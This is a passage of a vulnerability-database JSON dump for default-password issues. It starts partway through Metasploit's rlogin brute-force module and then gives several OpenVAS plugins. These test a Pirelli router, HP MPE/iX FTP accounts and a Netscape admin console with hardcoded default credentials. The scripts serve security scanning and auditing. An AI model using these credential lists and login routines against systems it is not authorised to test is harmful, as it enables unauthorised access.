credentials.concat(combine_users_and_passwords(users, passwords))\n credentials.uniq!\n\n # Okay, now we have a list of credentials to try. We want to merge in\n # our list of from users for each user.\n indexes = {}\n credentials.map! { |u,p|\n idx = indexes[u]\n idx ||= 0\n\n pa = nil\n if idx >= fromusers.length\n pa = [ nil, p ]\n else\n pa = [ fromusers[idx], p ]\n indexes[u] = idx + 1\n end\n [ u, pa ]\n }\n\n # If there are more fromusers than passwords, append nil passwords, which will be handled\n # specially by the login processing.\n indexes.each_key { |u|\n idx = indexes[u]\n while idx < fromusers.length\n credentials << [ u, [ fromusers[idx], nil ] ]\n idx += 1\n end\n }\n indexes = {}\n\n # We do a second uniq! pass in case we added some dupes somehow\n credentials.uniq!\n\n fq_rest = \"%s:%s:%s\" % [datastore['RHOST'], datastore['RPORT'], \"all remaining users\"]\n\n credentials.each do |u, fupw|\n break if @@credentials_skipped[fq_rest]\n\n fq_user = \"%s:%s:%s\" % [datastore['RHOST'], datastore['RPORT'], u]\n\n userpass_sleep_interval unless @@credentials_tried.empty?\n\n next if @@credentials_skipped[fq_user]\n next if @@credentials_tried[fq_user] == fupw\n\n fu,p = fupw\n ret = block.call(u, fu, p)\n\n case ret\n when :abort # Skip the current host entirely.\n break\n\n when :next_user # This means success for that user.\n @@credentials_skipped[fq_user] = fupw\n if datastore['STOP_ON_SUCCESS'] # See?\n @@credentials_skipped[fq_rest] = true\n end\n\n when :skip_user # Skip the user in non-success cases.\n @@credentials_skipped[fq_user] = fupw\n\n when :connection_error # Report an error, skip this cred, but don't abort.\n vprint_error \"#{datastore['RHOST']}:#{datastore['RPORT']} - Connection error, skipping '#{u}':'#{p}' from '#{fu}'\"\n\n end\n @@credentials_tried[fq_user] = fupw\n end\n end\n\n\n def try_user_pass(user, luser, pass, status = nil)\n luser ||= 'root'\n\n vprint_status \"#{rhost}:#{rport} rlogin - Attempting: '#{user}':#{pass.inspect} from '#{luser}'\"\n\n this_attempt ||= 0\n ret = nil\n while this_attempt <= 3 and (ret.nil? or ret == :refused)\n if this_attempt > 0\n # power of 2 back-off\n select(nil, nil, nil, 2**this_attempt)\n vprint_error \"#{rhost}:#{rport} rlogin - Retrying '#{user}':#{pass.inspect} from '#{luser}' due to reset\"\n end\n ret = do_login(user, pass, luser, status)\n this_attempt += 1\n end\n\n case ret\n when :no_pass_prompt\n vprint_status \"#{rhost}:#{rport} rlogin - Skipping '#{user}' due to missing password prompt\"\n return :skip_user\n\n when :busy\n vprint_error \"#{rhost}:#{rport} rlogin - Skipping '#{user}':#{pass.inspect} from '#{luser}' due to busy state\"\n\n when :refused\n vprint_error \"#{rhost}:#{rport} rlogin - Skipping '#{user}':#{pass.inspect} from '#{luser}' due to connection refused.\"\n\n when :skip_user\n vprint_status \"#{rhost}:#{rport} rlogin - Skipping disallowed user '#{user}' for subsequent requests\"\n return :skip_user\n\n when :success\n # session created inside do_login, ignore\n return :next_user\n\n else\n if login_succeeded?\n start_rlogin_session(rhost, rport, user, luser, pass, @trace)\n return :next_user\n end\n end\n\n # Default to returning whatever we got last..\n ret\n end\n\n\n def do_login(user, pass, luser, status = nil)\n # Reset our accumulators for interacting with /bin/login\n @recvd = ''\n @trace = ''\n\n # We must connect from a privileged port. This only occurs when status\n # is nil. That is, it only occurs when a connection doesn't already exist.\n if not status\n status = connect_from_privileged_port\n return :refused if status == :refused\n end\n\n # Abort if we didn't get successfully connected.\n return :abort if status != :connected\n\n # Send the local/remote usernames and the desired terminal type/speed\n sock.put(\"\\x00#{luser}\\x00#{user}\\x00#{datastore['TERM']}/#{datastore['SPEED']}\\x00\")\n\n # Read the expected nul byte response.\n buf = sock.get_once(1) || ''\n return :abort if buf != \"\\x00\"\n\n # NOTE: We report this here, since we are awfully convinced now that this is really\n # an rlogin service.\n report_service(\n :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :name => 'login'\n )\n\n # Receive the initial response\n Timeout.timeout(10) do\n recv\n end\n\n if busy_message?\n self.sock.close unless self.sock.closed?\n return :busy\n end\n\n # If we're not trusted, we should get a password prompt. Otherwise, we might be in already :)\n if login_succeeded?\n # should we report a vuln here? rlogin allowed w/o password?!\n print_good(\"#{target_host}:#{rport}, rlogin '#{user}' from '#{luser}' with no password.\")\n start_rlogin_session(rhost, rport, user, luser, nil, @trace)\n return :success\n end\n\n # no password to try, give up if luser isnt enough.\n if not pass\n vprint_error(\"#{target_host}:#{rport}, rlogin '#{user}' from '#{luser}' failed (no password to try)\")\n return :fail\n end\n\n # Allow for slow echos\n 1.upto(10) do\n recv(self.sock, 0.10) unless @recvd.nil? || password_prompt?(@recvd)\n end\n\n vprint_status(\"#{rhost}:#{rport} Prompt: #{@recvd.gsub(/[\\r\\n\\e\\b\\a]/, ' ')}\")\n\n # Not successful yet, maybe we got a password prompt.\n if password_prompt?(user)\n send_pass(pass)\n\n # Allow for slow echos\n 1.upto(10) do\n recv(self.sock, 0.10)\n break if login_succeeded?\n end\n\n vprint_status(\"#{rhost}:#{rport} Result: #{@recvd.gsub(/[\\r\\n\\e\\b\\a]/, ' ')}\")\n\n if login_succeeded?\n print_good(\"#{target_host}:#{rport}, rlogin '#{user}' successful with password #{pass.inspect}\")\n start_rlogin_session(rhost, rport, user, nil, pass, @trace)\n return :success\n else\n return :fail\n end\n else\n if login_succeeded? && @recvd !~ /^#{user}\\x0d*\\x0a/\n return :succeeded # intentionally not :success\n else\n self.sock.close unless self.sock.closed?\n return :no_pass_prompt\n end\n end\n\n # For debugging only.\n #rescue ::Exception\n #\tprint_error(\"#{$!}\")\n\n ensure\n disconnect()\n end\n\n\n def start_rlogin_session(host, port, user, luser, pass, proof)\n\n auth_info = {\n :host\t=> host,\n :port\t=> port,\n :sname => 'login',\n :user\t=> user,\n :proof => proof,\n :source_type => \"user_supplied\",\n :active => true\n }\n\n merge_me = {\n 'USERPASS_FILE' => nil,\n 'USER_FILE' => nil,\n 'FROMUSER_FILE' => nil,\n 'PASS_FILE' => nil,\n 'USERNAME' => user,\n }\n\n if pass\n auth_info.merge!(:pass => pass)\n merge_me.merge!('PASSWORD' => pass)\n info = \"RLOGIN #{user}:#{pass} (#{host}:#{port})\"\n else\n auth_info.merge!(:luser => luser)\n merge_me.merge!('FROMUSER'=> luser)\n info = \"RLOGIN #{user} from #{luser} (#{host}:#{port})\"\n end\n\n report_auth_info(auth_info)\n start_session(self, info, merge_me) if datastore['CreateSession']\n\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/rservices/rlogin_login.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-08-31T16:39:26", "description": "The remote host is a Pirelli AGE mB (microBusiness) router with its\n default password set (admin/microbusiness).", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "Default password router Pirelli AGE mB", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2019-08-30T00:00:00", "id": "OPENVAS:136141256231012641", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231012641", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Default password router Pirelli AGE mB\n#\n# Authors:\n# Anonymous\n#\n# Copyright:\n# Copyright (C) 1999 Anonymous\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.12641\");\n script_version(\"2019-08-30T13:00:30+0000\");\n script_tag(name:\"last_modification\", value:\"2019-08-30 13:00:30 +0000 (Fri, 30 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-1999-0502\");\n script_name(\"Default password router Pirelli AGE mB\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 1999 Anonymous\");\n script_family(\"Default Accounts\");\n script_dependencies(\"telnetserver_detect_type_nd_version.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_mandatory_keys(\"telnet/banner/available\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_tag(name:\"solution\", value:\"Telnet to this router and set a password immediately.\");\n\n script_tag(name:\"summary\", value:\"The remote host is a Pirelli AGE mB (microBusiness) router with its\n default password set (admin/microbusiness).\");\n\n script_tag(name:\"impact\", value:\"An attacker could telnet to it and reconfigure it to lock the owner out\n and to prevent him from using his Internet connection, and do bad things.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"default_account.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"dump.inc\");\n\n# If optimize_test = no\nif( get_kb_item( \"default_credentials/disable_default_account_checks\" ) ) exit( 0 );\n\nport = telnet_get_port( default:23 );\n\nbanner = telnet_get_banner( port:port );\nif( ! banner || \"USER:\" >!< banner ) exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( soc ) {\n\n r = recv_until( socket:soc, pattern:\"(USER:|ogin:)\" );\n if ( \"USER:\" >!< r ) {\n close( soc );\n exit( 0 );\n }\n\n s = string( \"admin\\r\\nmicrobusiness\\r\\n\" );\n send( socket:soc, data:s );\n r = recv_until( socket:soc, pattern:\"Configuration\" );\n close( soc );\n\n if( r && \"Configuration\" >< r ) {\n security_message( port:port );\n exit( 0 );\n }\n}\n\n#Second try as User (reopen soc because wrong pass disconnect)\nsoc = open_sock_tcp( port );\nif( soc ) {\n\n r = recv_until( socket:soc, pattern:\"(USER:|ogin:)\" );\n if ( \"USER:\" >!< r ) {\n close( soc );\n exit( 0 );\n }\n\n s = string( \"user\\r\\npassword\\r\\n\" );\n send( socket:soc, data:s );\n r = recv_until( socket:soc, pattern:\"Configuration\" );\n close( soc );\n\n if( r && \"Configuration\" >< r ) {\n security_message( port:port );\n }\n}\n\nexit( 0 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-11T19:06:07", "description": "This host has one or more accounts with a blank\n password.", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "MPEi/X Default Accounts (FTP)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2020-05-07T00:00:00", "id": "OPENVAS:136141256231011000", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011000", "sourceData": "# OpenVAS Vulnerability Test\n# Description: MPEi/X Default Accounts\n#\n# Authors:\n# H D Moore <hdmoore@digitaldefense.net>\n#\n# Copyright:\n# Copyright (C) 2001 H D Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11000\");\n script_version(\"2020-05-07T12:32:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 12:32:15 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-1999-0502\");\n script_name(\"MPEi/X Default Accounts (FTP)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2001 H D Moore\");\n script_family(\"Default Accounts\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/hp/arpa_ftp/detected\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_tag(name:\"solution\", value:\"Apply complex passwords to all accounts.\");\n\n script_tag(name:\"summary\", value:\"This host has one or more accounts with a blank\n password.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\n\n# default account listing\naccounts[0] = \"OPERATOR.SYS\";\naccounts[1] = \"MANAGER.SYS\";\naccounts[2] = \"SPECTRUM.CU1\";\naccounts[3] = \"CU1.DBA\";\naccounts[4] = \"CU1.MANAGER\";\naccounts[5] = \"CU1.MGR\";\naccounts[6] = \"CUTEST1.MANAGER\";\naccounts[7] = \"CUTEST1.MGR\";\naccounts[8] = \"CUTRAIN.MANAGER\";\naccounts[9] = \"CUTRAIN.MGR\";\naccounts[10] = \"SUPPORT.FIELD\";\naccounts[11] = \"SUPPORT.MANAGER\";\naccounts[12] = \"SUPPORT.MGR\";\naccounts[13] = \"SUPPORT.OPERATOR\";\naccounts[14] = \"SYS.MANAGER\";\naccounts[15] = \"SYS.MGR\";\naccounts[16] = \"SYS.NWIXUSER\";\naccounts[17] = \"SYS.OPERATOR\";\naccounts[18] = \"SYS.PCUSER\";\naccounts[19] = \"SYS.RSBCMON\";\naccounts[20] = \"SYSMGR.MANAGER\";\naccounts[21] = \"SYSMGR.MGR\";\naccounts[22] = \"TELAMON.MANAGER\";\naccounts[23] = \"TELAMON.MGR\";\naccounts[24] = \"TELESUP.FIELD\";\naccounts[25] = \"TELESUP.MAIL\";\naccounts[26] = \"TELESUP.MANAGER\";\naccounts[27] = \"TELESUP.MGR\";\naccounts[28] = \"VECSL.MANAGER\";\naccounts[29] = \"VECSL.MGR\";\naccounts[30] = \"VESOFT.MANAGER\";\naccounts[31] = \"VESOFT.MGR\";\naccounts[32] = \"BIND.MANAGER\";\naccounts[33] = \"BIND.MGR\";\naccounts[34] = \"CAROLIAN.MANAGER\";\naccounts[35] = \"CAROLIAN.MGR\";\naccounts[36] = \"CCC.MANAGER\";\naccounts[37] = \"CCC.MGR\";\naccounts[38] = \"CCC.SPOOL\";\naccounts[39] = \"CNAS.MGR\";\naccounts[40] = \"COGNOS.MANAGER\";\naccounts[41] = \"COGNOS.MGR\";\naccounts[42] = \"COGNOS.OPERATOR\";\naccounts[43] = \"CONV.MANAGER\";\naccounts[44] = \"CONV.MGR\";\naccounts[45] = \"HPLANMANAGER.MANAGER\";\naccounts[46] = \"HPLANMANAGER.MGR\";\naccounts[47] = \"HPNCS.FIELD\";\naccounts[48] = \"HPNCS.MANAGER\";\naccounts[49] = \"HPNCS.MGR\";\naccounts[50] = \"HPOFFICE.ADVMAIL\";\naccounts[51] = \"HPOFFICE.DESKMON\";\naccounts[52] = \"HPOFFICE.MAIL\";\naccounts[53] = \"HPOFFICE.MAILMAN\";\naccounts[54] = \"HPOFFICE.MAILROOM\";\naccounts[55] = \"HPOFFICE.MAILTRCK\";\naccounts[56] = \"HPOFFICE.MANAGER\";\naccounts[57] = \"HPOFFICE.MGR\";\naccounts[58] = \"HPOFFICE.OPENMAIL\";\naccounts[59] = \"HPOFFICE.PCUSER\";\naccounts[60] = \"HPOFFICE.SPOOLMAN\";\naccounts[61] = \"HPOFFICE.WP\";\naccounts[62] = \"HPOFFICE.X400FER\";\naccounts[63] = \"HPOPTMGT.MANAGER\";\naccounts[64] = \"HPOPTMGT.MGR\";\naccounts[65] = \"HPPL85.FIELD\";\naccounts[66] = \"HPPL85.MANAGER\";\naccounts[67] = \"HPPL85.MGR\";\naccounts[68] = \"HPPL87.FIELD\";\naccounts[69] = \"HPPL87.MANAGER\";\naccounts[70] = \"HPPL87.MGR\";\naccounts[71] = \"HPPL89.FIELD\";\naccounts[72] = \"HPPL89.MANAGER\";\naccounts[73] = \"HPPL89.MGR\";\naccounts[74] = \"HPSKTS.MANAGER\";\naccounts[75] = \"HPSKTS.MGR\";\naccounts[76] = \"HPWORD.MANAGER\";\naccounts[77] = \"HPWORD.MGR\";\naccounts[78] = \"INFOSYS.MANAGER\";\naccounts[79] = \"INFOSYS.MGR\";\naccounts[80] = \"ITF3000.MANAGER\";\naccounts[81] = \"ITF3000.MGR\";\naccounts[82] = \"JAVA.MANAGER\";\naccounts[83] = \"JAVA.MGR\";\naccounts[84] = \"RJE.MANAGER\";\naccounts[85] = \"RJE.MGR\";\naccounts[86] = \"ROBELLE.MANAGER\";\naccounts[87] = \"ROBELLE.MGR\";\naccounts[88] = \"SNADS.MANAGER\";\naccounts[89] = \"SNADS.MGR\";\n\nport = ftp_get_port(default:21);\nbanner = ftp_get_banner(port:port);\nif(! banner || \"HP ARPA FTP\" >!< banner)\n exit(0);\n\nsoc = open_sock_tcp(port);\nif(!soc)exit(0);\nd = ftp_recv_line(socket:soc);\n\nCRLF = raw_string(0x0d, 0x0a);\ncracked = string(\"\");\n\nfor(i=0; accounts[i]; i = i +1)\n{\n username = accounts[i];\n user = string(\"USER \", username, CRLF);\n\n send(socket:soc, data:user);\n resp = ftp_recv_line(socket:soc);\n\n if (\"230 User logged on\" >< resp) {\n cracked = string(cracked, username, \"\\n\");\n }\n}\nftp_close(soc);\n\nif(strlen(cracked)) {\n report = string(\"These accounts have no passwords:\\n\\n\", cracked);\n security_message(port:port, data:report);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-08T11:44:11", "description": "This host has one or more accounts with a blank \npassword. Please see the data section for a list \nof these accounts.", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "MPEi/X Default Accounts", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2017-12-07T00:00:00", "id": "OPENVAS:11000", "href": "http://plugins.openvas.org/nasl.php?oid=11000", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: DDI_MPEiX_FTP_Accounts.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: MPEi/X Default Accounts\n#\n# Authors:\n# H D Moore <hdmoore@digitaldefense.net>\n#\n# Copyright:\n# Copyright (C) 2001 H D Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"This host has one or more accounts with a blank \npassword. Please see the data section for a list \nof these accounts.\";\n\ntag_solution = \"Apply complex passwords to all accounts.\";\n\nif(description)\n{\n script_id(11000); \n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-1999-0502\");\n name = \"MPEi/X Default Accounts\";\n\n script_name(name);\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n \n \n script_copyright(\"This script is Copyright (C) 2001 H D Moore\");\n family = \"Default Accounts\";\n\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\n\n#\n# default account listing\n#\naccounts[0] = \"OPERATOR.SYS\";\naccounts[1] = \"MANAGER.SYS\";\naccounts[2] = \"SPECTRUM.CU1\";\naccounts[3] = \"CU1.DBA\";\naccounts[4] = \"CU1.MANAGER\";\naccounts[5] = \"CU1.MGR\";\naccounts[6] = \"CUTEST1.MANAGER\";\naccounts[7] = \"CUTEST1.MGR\";\naccounts[8] = \"CUTRAIN.MANAGER\";\naccounts[9] = \"CUTRAIN.MGR\";\naccounts[10] = \"SUPPORT.FIELD\";\naccounts[11] = \"SUPPORT.MANAGER\";\naccounts[12] = \"SUPPORT.MGR\";\naccounts[13] = \"SUPPORT.OPERATOR\";\naccounts[14] = \"SYS.MANAGER\";\naccounts[15] = \"SYS.MGR\";\naccounts[16] = \"SYS.NWIXUSER\";\naccounts[17] = \"SYS.OPERATOR\";\naccounts[18] = \"SYS.PCUSER\";\naccounts[19] = \"SYS.RSBCMON\";\naccounts[20] = \"SYSMGR.MANAGER\";\naccounts[21] = \"SYSMGR.MGR\";\naccounts[22] = \"TELAMON.MANAGER\";\naccounts[23] = \"TELAMON.MGR\";\naccounts[24] = \"TELESUP.FIELD\";\naccounts[25] = \"TELESUP.MAIL\";\naccounts[26] = \"TELESUP.MANAGER\";\naccounts[27] = \"TELESUP.MGR\";\naccounts[28] = \"VECSL.MANAGER\";\naccounts[29] = \"VECSL.MGR\";\naccounts[30] = \"VESOFT.MANAGER\";\naccounts[31] = \"VESOFT.MGR\";\naccounts[32] = \"BIND.MANAGER\";\naccounts[33] = \"BIND.MGR\";\naccounts[34] = \"CAROLIAN.MANAGER\";\naccounts[35] = \"CAROLIAN.MGR\";\naccounts[36] = \"CCC.MANAGER\";\naccounts[37] = \"CCC.MGR\";\naccounts[38] = \"CCC.SPOOL\";\naccounts[39] = \"CNAS.MGR\";\naccounts[40] = \"COGNOS.MANAGER\";\naccounts[41] = \"COGNOS.MGR\";\naccounts[42] = \"COGNOS.OPERATOR\";\naccounts[43] = \"CONV.MANAGER\";\naccounts[44] = \"CONV.MGR\";\naccounts[45] = \"HPLANMANAGER.MANAGER\";\naccounts[46] = \"HPLANMANAGER.MGR\";\naccounts[47] = \"HPNCS.FIELD\";\naccounts[48] = \"HPNCS.MANAGER\";\naccounts[49] = \"HPNCS.MGR\";\naccounts[50] = \"HPOFFICE.ADVMAIL\";\naccounts[51] = \"HPOFFICE.DESKMON\";\naccounts[52] = \"HPOFFICE.MAIL\";\naccounts[53] = \"HPOFFICE.MAILMAN\";\naccounts[54] = \"HPOFFICE.MAILROOM\";\naccounts[55] = \"HPOFFICE.MAILTRCK\";\naccounts[56] = \"HPOFFICE.MANAGER\";\naccounts[57] = \"HPOFFICE.MGR\";\naccounts[58] = \"HPOFFICE.OPENMAIL\";\naccounts[59] = \"HPOFFICE.PCUSER\";\naccounts[60] = \"HPOFFICE.SPOOLMAN\";\naccounts[61] = \"HPOFFICE.WP\";\naccounts[62] = \"HPOFFICE.X400FER\";\naccounts[63] = \"HPOPTMGT.MANAGER\";\naccounts[64] = \"HPOPTMGT.MGR\";\naccounts[65] = \"HPPL85.FIELD\";\naccounts[66] = \"HPPL85.MANAGER\";\naccounts[67] = \"HPPL85.MGR\";\naccounts[68] = \"HPPL87.FIELD\";\naccounts[69] = \"HPPL87.MANAGER\";\naccounts[70] = \"HPPL87.MGR\";\naccounts[71] = \"HPPL89.FIELD\";\naccounts[72] = \"HPPL89.MANAGER\";\naccounts[73] = \"HPPL89.MGR\";\naccounts[74] = \"HPSKTS.MANAGER\";\naccounts[75] = \"HPSKTS.MGR\";\naccounts[76] = \"HPWORD.MANAGER\";\naccounts[77] = \"HPWORD.MGR\";\naccounts[78] = \"INFOSYS.MANAGER\";\naccounts[79] = \"INFOSYS.MGR\";\naccounts[80] = \"ITF3000.MANAGER\";\naccounts[81] = \"ITF3000.MGR\";\naccounts[82] = \"JAVA.MANAGER\";\naccounts[83] = \"JAVA.MGR\";\naccounts[84] = \"RJE.MANAGER\";\naccounts[85] = \"RJE.MGR\";\naccounts[86] = \"ROBELLE.MANAGER\";\naccounts[87] = \"ROBELLE.MGR\";\naccounts[88] = \"SNADS.MANAGER\";\naccounts[89] = \"SNADS.MGR\";\n\n#\n# The script code starts here\n#\n\n\n# open the connection\nport = get_kb_item(\"Services/ftp\");\nif(!port)port = 21;\nif(!get_port_state(port))exit(0);\n\nbanner = get_ftp_banner(port:port);\n\n# check for HP ftp service\nif(\"HP ARPA FTP\" >< banner)\n{\n # do nothing\n} else {\n exit(0);\n}\n\nsoc = open_sock_tcp(port);\nif(!soc)exit(0);\nd = ftp_recv_line(socket:soc);\n\nCRLF = raw_string(0x0d, 0x0a);\ncracked = string(\"\");\n\nfor(i=0; accounts[i]; i = i +1)\n{\n username = accounts[i];\n user = string(\"USER \", username, CRLF); \n \n send(socket:soc, data:user);\n resp = ftp_recv_line(socket:soc);\n \n if (\"230 User logged on\" >< resp)\n {\n cracked = string(cracked, username, \"\\n\");\n }\n}\nftp_close(soc);\n\nif (strlen(cracked))\n{\n report = string(\"These accounts have no passwords:\\n\\n\", cracked);\n security_message(port:port, data:report);\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-05-11T19:06:04", "description": "This host is running the Netscape Enterprise Server. The Administrative\n interface for this web server, which operates on port 8888/TCP, is using\n the default username and password of ", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "Netscape Enterprise Default Administrative Password (HTTP)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2020-05-07T00:00:00", "id": "OPENVAS:136141256231011208", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011208", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Netscape Enterprise Default Administrative Password\n#\n# Authors:\n# Forrest Rae <forrest.rae@digitaldefense.net>\n#\n# Copyright:\n# Copyright (C) 2003 Digital Defense Inc.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11208\");\n script_version(\"2020-05-07T12:32:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 12:32:15 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-1999-0502\");\n script_name(\"Netscape Enterprise Default Administrative Password (HTTP)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2003 Digital Defense Inc.\");\n script_family(\"Default Accounts\");\n script_dependencies(\"gb_get_http_banner.nasl\", \"gb_default_credentials_options.nasl\");\n script_mandatory_keys(\"Netscape_iPlanet/banner\");\n script_require_ports(\"Services/www\", 8888);\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_tag(name:\"solution\", value:\"Please assign the web administration console a difficult to guess\n password.\");\n\n script_tag(name:\"summary\", value:\"This host is running the Netscape Enterprise Server. The Administrative\n interface for this web server, which operates on port 8888/TCP, is using\n the default username and password of 'admin'.\");\n\n script_tag(name:\"impact\", value:\"An attacker can use this to reconfigure the web server, cause a denial\n of service condition, or gain access to this host.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:8888 );\n\nbanner = http_get_remote_headers( port:port );\nif( ! banner || ( \"Netscape\" >!< banner && \"iPlanet\" >!< banner ) )\n exit( 0 );\n\nurl = \"/https-admserv/bin/index\";\nreq = http_get( item:url, port:port );\nreq = req - string( \"\\r\\n\\r\\n\" );\n# HTTP auth = \"admin:admin\"\nreq = string( req, \"\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\n\\r\\n\" );\nres = http_keepalive_send_recv( port:port, data:req );\n\nif( \"Web Server Administration Server\" >< res && \"index?tabs\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report);\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": 